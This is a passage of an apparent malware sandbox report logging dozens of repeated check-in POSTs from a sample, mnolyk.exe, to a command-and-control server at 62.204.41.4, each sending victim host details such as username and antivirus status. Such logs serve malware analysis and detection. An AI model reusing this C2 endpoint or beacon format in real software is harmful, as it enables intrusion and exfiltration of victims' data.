                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:17:49.757086039 CET431INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:17:49 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        231192.168.2.54992162.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:17:49.926933050 CET432OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:17:49.994590998 CET432INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:17:49 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        232192.168.2.54992262.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:17:50.176453114 CET433OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:17:50.242876053 CET433INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:17:50 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        233192.168.2.54992362.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:17:50.412938118 CET434OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:17:50.478907108 CET434INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:17:50 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        234192.168.2.54992462.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:17:50.645406008 CET435OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:17:50.711787939 CET435INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:17:50 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        235192.168.2.54992562.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:17:50.890187025 CET436OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:17:50.955138922 CET436INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:17:50 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        236192.168.2.54992662.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:17:51.137579918 CET437OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:17:51.206058979 CET437INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:17:51 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        237192.168.2.54992762.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:17:51.554248095 CET438OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:17:51.619070053 CET438INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:17:51 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        238192.168.2.54992862.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:17:51.819639921 CET439OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:17:51.883795023 CET439INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:17:51 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        239192.168.2.54992962.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:17:52.146320105 CET440OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:17:52.217864037 CET440INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:17:52 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        24192.168.2.54971462.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:16:34.963073015 CET224OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:16:35.026926041 CET225INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:16:35 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        240192.168.2.54993062.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:17:53.103784084 CET441OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:17:53.168404102 CET441INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:17:53 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        241192.168.2.54993162.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:17:53.428937912 CET442OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:17:53.494733095 CET442INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:17:53 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        242192.168.2.54993262.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:17:53.704513073 CET443OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:17:53.767765999 CET443INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:17:53 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        243192.168.2.54993362.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:17:54.746192932 CET444OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:17:54.813713074 CET444INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:17:54 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        244192.168.2.54993462.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:17:55.067276001 CET445OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:17:55.136074066 CET445INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:17:55 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        245192.168.2.54993562.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:17:55.397933006 CET446OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:17:55.461610079 CET446INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:17:55 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        246192.168.2.54993662.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:17:55.677694082 CET447OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:17:55.744800091 CET447INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:17:55 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        247192.168.2.54993762.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:17:55.913688898 CET448OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:17:55.976597071 CET448INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:17:55 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        248192.168.2.54993862.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:17:56.145927906 CET449OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:17:56.213244915 CET449INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:17:56 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        249192.168.2.54993962.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:17:56.379898071 CET450OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
